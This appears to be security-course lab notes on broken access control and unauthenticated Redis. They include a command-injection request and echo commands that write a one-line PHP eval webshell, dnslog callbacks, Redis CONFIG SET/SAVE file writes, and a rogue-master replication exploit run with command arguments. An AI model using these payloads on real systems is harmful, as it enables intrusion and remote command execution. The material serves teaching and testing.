Broken access control (acting beyond authorised privileges)
1. Broken access control (acting beyond authorised privileges)
1.1 OWASP Top 10
1.1.1 A5:2017-Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers exploit these flaws to reach unauthorised functions or data: other users' accounts, sensitive files, modification of other users' data, changes to access rights, and so on.
1.1.2 A01:2021-Broken Access Control
Access control enforces policies so that users cannot act outside of their intended permissions. Failure of access control often results in unauthorized disclosure of information, modification or destruction of all data, or execution of business functions outside of user privileges.
1.2 Categories of broken access control
Classified by the direction in which privileges are exceeded:
1.2.1 Horizontal privilege escalation
A user of one account reaches the data or functions of another account at the same privilege level (for example, reading another user's record by changing its identifier in the request). This is the usual meaning of the term in web applications.
1.2.2 Vertical privilege escalation
A low-privilege user obtains the functions or rights of a higher-privilege role. The term is most often used for an ordinary user gaining administrator rights, for example through an operating-system vulnerability.
1.3 Attack and defense cases
1.3.1 DVWA: command execution without a session
The captured request below is the final step of this case: with no Cookie header at all, the body appends a command to the ip parameter with | and writes a one-line PHP webshell into the source directory.
POST /dvwa_2.0.1/vulnerabilities/exec/source/low.php HTTP/1.1
Host: 192.168.111.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.111.15/dvwa_2.0.1/vulnerabilities/exec/source/
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

ip=127.0.0.0.1|echo+"<?php+@eval($_REQUEST[777])?>"+>+shell.php&Submit=Submit
1.3.1.1 Practical operation
On the server where DVWA is deployed, open the C drive -> phpstudy -> WWW -> DV (the DVWA web root). The directories of interest are config (global configuration), hackable (flags, the included files, and upload, the upload directory) and vulnerabilities (the vulnerable pages).
Start Burp Suite, open DVWA in the browser, go to Command Injection and submit 127.0.0.1.
Capture the request in Burp and send it to Repeater.
The response shows that ping 127.0.0.1 was executed, so the input is concatenated into a shell command and further commands can be appended. The command-chaining operators are:
command1 & command2    # cmd.exe: run command1, then command2 regardless of command1's result (in a POSIX shell & instead backgrounds command1)
command1 && command2   # run command2 only if command1 succeeded
command1 | command2    # pipe: command1's output becomes command2's input; both run
command1 || command2   # run command2 only if command1 failed
command1 ; command2    # run command2 after command1 finishes (POSIX shells; cmd.exe does not treat ; as a separator)
To append a command we use &. Because the form body already uses & to separate parameters (ip=...&Submit=Submit), the & that separates the two commands must be URL-encoded as %26: in Burp, select it and press Ctrl+U.
Click Send.
The cookie carries security=low, i.e. the lowest difficulty level; the script serving that level is vulnerabilities/exec/source/low.php.
Open low.php. The file contains no session or access check of any kind: it is meant to be included by index.php, which performs the login check, but nothing stops it from being requested directly, even after logging out.
Copy the path of low.php, log out of DVWA and visit
http://192.168.16.136/dv/vulnerabilities/exec/source/low.php
The page is blank, but it is a working endpoint. Find the request in Burp, send it to Repeater and click Send: the response is empty.
Remove the Cookie header, change the request method to POST (right-click -> Change request method) and send both parameters together:
ip=127.0.0.1%26whoami&Submit=Submit
Submit is needed so that the isset($_POST['Submit']) check in low.php is passed; ip is then concatenated into the ping command. There is still no output in the response: low.php appends the command output to $html, which only index.php ever prints, so the direct call renders nothing.
With no echo, the response alone cannot tell us whether the command ran. Replace whoami with calc (start the Windows calculator): the calculator pops up on the server hosting the DVWA lab, proving execution.
DVWA requires a login to work on its exercises, yet this exercise was just completed without one. The missing output does not matter: when testing for the vulnerability we only care whether the command executed, and since it did, this is an unauthorised access (broken access control) flaw, here chained with command injection.
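The check performed above (an endpoint that should need a login answers an anonymous POST, and the injected & has to travel as %26), as an added Python example that is not code from these notes or from DVWA. It stands up a small local fake of index.php and low.php so it runs offline; the paths under /dvwa/vulnerabilities/exec and the PHPSESSID cookie name are assumptions modelled on DVWA, and the fake executes nothing.

```python
"""Forced-browsing check for a page that should require a login.

Constructed example: FakeDvwa stands in for DVWA.  Its index.php bounces
anonymous clients to login.php; its source/low.php has no session check,
"runs" the ping and answers 200 with an empty body, because the real
file appends output to $html and only index.php prints it.
"""
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import HTTPRedirectHandler, Request, build_opener

EXECUTED = []  # command lines the fake low.php "ran", for inspection


class FakeDvwa(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the example quiet
        pass

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        has_session = "PHPSESSID=" in self.headers.get("Cookie", "")
        if self.path.endswith("/exec/index.php"):
            if not has_session:  # index.php enforces the login
                self.send_response(302)
                self.send_header("Location", "/dvwa/login.php")
            else:
                self.send_response(200)
            self.end_headers()
        elif self.path.endswith("/exec/source/low.php"):
            # low.php only checks isset($_POST['Submit']), never the session
            if "Submit" in form:
                EXECUTED.append("ping " + form.get("ip", [""])[0])
            self.send_response(200)
            self.end_headers()  # empty body: no echo, but the command ran
        else:
            self.send_response(404)
            self.end_headers()


class NoRedirect(HTTPRedirectHandler):
    """Keep the 302 itself; following it would hide the access-control verdict."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = build_opener(NoRedirect)


def injection_body(ip, command, separator="&"):
    """Form body with `separator + command` appended inside the ip field.
    urlencode percent-encodes the separator (& -> %26, | -> %7C) so the
    server-side form parser keeps it in ip instead of starting a new
    parameter at it."""
    return urlencode({"ip": f"{ip}{separator}{command}", "Submit": "Submit"})


def status_without_session(url, body):
    """POST with no Cookie header at all; return the raw status code."""
    req = Request(url, data=body.encode(), method="POST",
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status
    except HTTPError as err:  # 3xx/4xx/5xx arrive here
        return err.code


def reachable_without_session(url, body):
    """200 means the page was served to an anonymous client; a 3xx to the
    login page means the control held.  Body length is irrelevant: low.php
    answers blank even though the command executed."""
    return status_without_session(url, body) == 200


def start_fake_dvwa():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeDvwa)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}/dvwa/vulnerabilities/exec"


def run_check():
    base = start_fake_dvwa()
    body = injection_body("127.0.0.1", "whoami")
    return {
        "body": body,
        "index_php": reachable_without_session(base + "/index.php", body),
        "low_php": reachable_without_session(base + "/source/low.php", body),
        "executed": list(EXECUTED),
    }


if __name__ == "__main__":
    print(run_check())
```

To run it against the lab, point reachable_without_session at the real low.php URL instead of the fake server: a 302 to login.php means the control held, a 200 means the source file is served to anyone, whatever the body says.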
1.3.1.2 Using the vulnerability to write a webshell
Execute
echo xujie >xujie.txt
A new file xujie.txt appears in the /exec/source directory.
Creating a file on the target is a noisy and intrusive way to confirm execution. A quieter check is an out-of-band DNS lookup: on the dnslog.cn platform click to create a domain name, then have the target resolve it:
nslookup <domain>
Afterwards check dnslog.cn for a resolution record; if one exists, nslookup was executed.
Create a one-line PHP shell:
echo "<?php @eval($_REQUEST[777])?>" >shell.php
Visit shell.php, then connect to it with AntSword.
1.4 Related vulnerabilities
1.4.1 Directory traversal
Directory traversal (path traversal): a web user can, by some means, access files outside the web root and, in the worst case, go on to execute system commands.
Common causes of directory traversal:
- file inclusion
- file read
- RCE
1.4.2 Unauthorised access
Unauthorised access: an important asset has no access control at all, so an attacker can operate on it without any credentials, including sensitive operations such as reading and writing files and executing commands.
2. Unauthorized access
2.1 Unauthorised access to Redis
Redis accepts connections with no account or password. Consequences: sensitive data is leaked; and because Redis can read and write files on its host, an attacker can also write a webshell, plant an SSH public key, or add a scheduled task that spawns a reverse shell.
2.1.1 Introduction to Redis
Redis is a non-relational (NoSQL) in-memory store. It has no tables; data is stored as key-value pairs.
Redis is commonly used as a cache in web applications.
Redis can interact with the file system: it persists its data set to a file whose directory and name are set by configuration.
Redis listens on TCP/6379 by default.
2.1.2 Simple use of Redis
When no password is set, a client tool connects directly.
┌──(ajest㉿zh-CN)-[~/vulhub/vulhub/redis/4-unacc]
└─$ redis-cli -h 127.0.0.1
127.0.0.1:6379> set name AJEST
OK
127.0.0.1:6379> get name
"AJEST"
127.0.0.1:6379> config set dir /tmp/
OK
127.0.0.1:6379> config set dbfilename ajest.txt
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
2.1.3 Unauthorised access to Redis
Read database contents | Read and write system files | Execute system commands
---|---|---
Data leakage | Write a WebShell directly; scheduled task for a reverse shell; SSH key for password-less login | redis-rogue-getshell (master-slave replication)
2.2 Redis practical operation
2.2.1 Environment setup
cd into the /vulhub/redis/4-unacc directory and run
sudo docker-compose up -d
to start the Redis environment.
2.2.2 Exploiting the vulnerability
sudo docker ps -a
shows the container and its published port.
Connect:
redis-cli -h 127.0.0.1   # -h sets the host; connect to the Redis on this machine
The connection succeeds with no account or password, so the instance has an unauthorised access vulnerability.
Redis stores data as key-value pairs; think of it as one very large associative array. It is usually used as a cache.
config set dir /tmp/
config set dbfilename xujie.txt   # persist the data set to /tmp/xujie.txt
save                              # actually write the file (as in 2.1.2; without it nothing is written)
Because we are connected to the Redis inside the Docker container, exec into the container to check that the file was created:
sudo docker exec -it 9a4f956818dc /bin/bash   # -it: interactive terminal; 9a4f956818dc is the container ID; /bin/bash is the shell to run in it
To confirm that the file exists and that Redis was able to write it:
ls /tmp
cat /tmp/xujie.txt
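The PING-then-CONFIG SET/SAVE exchange from 2.1.2 and 2.2.2, as an added Python example that is not the vulhub environment, redis-cli or any of the tools named in these notes: raw RESP on a socket, with a small fake Redis in a thread so both sides of the exchange can be seen offline. The open instance answers with no AUTH, as a 6379 without requirepass does; a second instance answers -NOAUTH to show the other outcome. The temp directory, file name, key and the "RDB" stand-in are constructed for the example.

```python
# Constructed example: FakeRedis stands in for the vulhub container; its
# "RDB" output is a stand-in (real dump files are binary, with type and
# length bytes around each value).  Paths, key and payload are made up.
import os
import socket
import tempfile
import threading


def encode(*args):
    """RESP array of bulk strings, what redis-cli puts on the wire, e.g.
    encode("PING") == b"*1\\r\\n$4\\r\\nPING\\r\\n"."""
    out = f"*{len(args)}\r\n".encode()
    for arg in args:
        data = str(arg).encode()
        out += b"$%d\r\n%s\r\n" % (len(data), data)
    return out


def talk(host, port, *cmds):
    """Send commands in order with no AUTH; return each reply's first line
    (+OK, +PONG, -NOAUTH ...) with the CRLF stripped."""
    replies = []
    with socket.create_connection((host, port), timeout=3) as s, s.makefile("rb") as f:
        for cmd in cmds:
            s.sendall(encode(*cmd))
            replies.append(f.readline().decode().rstrip("\r\n"))
    return replies


class FakeRedis(threading.Thread):
    """Just enough server for the check: PING, CONFIG SET, SET, SAVE."""

    def __init__(self, require_auth=False):
        super().__init__(daemon=True)
        self.require_auth = require_auth
        self.cfg = {"dir": tempfile.mkdtemp(), "dbfilename": "dump.rdb"}
        self.db = {}
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self.serve, args=(conn,), daemon=True).start()

    def serve(self, conn):
        f = conn.makefile("rb")
        while True:
            head = f.readline()  # "*<n>" array header
            if not head.startswith(b"*"):
                return  # client closed the connection
            args = []
            for _ in range(int(head[1:].strip())):
                size = int(f.readline()[1:].strip())  # "$<len>"
                args.append(f.read(size + 2)[:-2].decode())
            conn.sendall(self.handle(args).encode())

    def handle(self, args):
        cmd = args[0].upper()
        if self.require_auth and cmd != "AUTH":
            return "-NOAUTH Authentication required.\r\n"
        if cmd == "PING":
            return "+PONG\r\n"
        if cmd == "CONFIG" and args[1].upper() == "SET":
            self.cfg[args[2]] = args[3]  # dir / dbfilename, no restriction
            return "+OK\r\n"
        if cmd == "SET":
            self.db[args[1]] = args[2]
            return "+OK\r\n"
        if cmd == "SAVE":  # dump every value into dir/dbfilename
            path = os.path.join(self.cfg["dir"], self.cfg["dbfilename"])
            with open(path, "wb") as fh:
                fh.write(b"REDIS0008" + b"".join(
                    v.encode() + b"\n" for v in self.db.values()))
            return "+OK\r\n"
        return "-ERR unknown command\r\n"


def check_unauth(host, port):
    """One PING with no AUTH: +PONG means anyone may talk to the database,
    -NOAUTH means requirepass is set."""
    reply = talk(host, port, ("PING",))[0]
    if reply == "+PONG":
        return "unauthenticated"
    if reply.startswith("-NOAUTH"):
        return "auth required"
    return "unexpected: " + reply


def write_file(host, port, directory, filename, payload):
    """The CONFIG SET dir / dbfilename + SAVE sequence from the notes: the
    value of a key ends up inside the file written at that path."""
    return talk(host, port,
                ("CONFIG", "SET", "dir", directory),
                ("CONFIG", "SET", "dbfilename", filename),
                ("SET", "x", payload),
                ("SAVE",))


def demo():
    open_srv, locked = FakeRedis(), FakeRedis(require_auth=True)
    open_srv.start()
    locked.start()
    verdicts = (check_unauth("127.0.0.1", open_srv.port),
                check_unauth("127.0.0.1", locked.port))
    replies = write_file("127.0.0.1", open_srv.port,
                         open_srv.cfg["dir"], "ajest.txt", "hello from redis")
    with open(os.path.join(open_srv.cfg["dir"], "ajest.txt"), "rb") as fh:
        return verdicts, replies, fh.read()
```

Against a real target, check_unauth(host, 6379) is the whole detection step; -NOAUTH is the answer a hardened instance gives, and Redis 3.2 and later also ship protected-mode, which refuses non-loopback clients when neither a bind address nor a password is configured. The file produced by SAVE carries binary RDB framing around the payload, which is why the crontab and authorized_keys targets in the table above tolerate the surrounding junk lines while stricter formats may not.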
The Redis in 4-unacc is also exposed to the master-slave replication (rogue server) attack, which yields system command execution; it requires an exploit script.
cd tools
proxychains git clone https://github.com/vulhub/redis-rogue-getshell.git
cd redis-rogue-getshell
cd RedisModulesSDK
make          # builds exp.so, the malicious module
cd ..
python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.16.175 -P 8888 -f RedisModulesSDK/exp.so -c "id"
python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.16.175 -P 8888 -f RedisModulesSDK/exp.so -c "whoami"
-r/-p are the target Redis, -L/-P the address and port on which the script listens as the rogue master (the target must be able to reach it), -f the module to deliver and -c the command to run. The script makes the target a replica of the rogue master, delivers exp.so as the synchronisation payload, loads it with MODULE LOAD and runs the command; the output is returned, confirming command execution on the Redis host.
2.2.3 Vulnerability detection
unauthorized_com is a detection script for unauthorised access to services; it covers thirty-eight checks in total.
cd ~/tools
ls
cd unauthorized_com
python3 unauthorized_com.py -i 127.0.0.1   # -i: target IP